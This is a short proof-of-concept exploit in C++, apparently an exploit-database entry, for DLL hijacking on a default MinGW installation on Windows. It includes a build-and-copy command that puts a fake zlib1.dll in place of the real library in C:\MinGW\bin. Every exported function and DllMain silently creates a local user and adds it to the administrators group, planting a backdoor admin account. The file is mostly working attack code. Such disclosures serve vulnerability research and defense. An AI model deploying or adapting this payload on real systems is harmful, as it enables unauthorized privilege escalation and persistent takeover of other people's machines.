Privilege escalation with DLL Hijack of zlib1.dll on a MinGW default installation

zlib1.dll.cpp

// Author: Felipe Molina (@felmoltor)
// 

// MinGW DLL Hijack Privilege Escalation POC.
// This dll will suplantate the legitimate library "zlib1.dll" residing inside 
// the default installation folder of MinGW "C:\MinGW\bin\zlib1.dll"
// 

// g++ -c -DPRIVESC_DLL mingwprivesc.dll.cpp & g++ -shared -o mingwprivesc.dll mingwprivesc.dll.o -Wl,--out-implib,main.a & copy /y mingwprivesc.dll C:\MinGW\bin\zlib1.dll

#include <windows.h>

extern "C" __declspec(dllexport) int compress() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int compressBound() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int inflateEnd() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}


extern "C" __declspec(dllexport) int inflateInit_() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int inflateReset() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int inflate() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
 compress();
 return TRUE;
}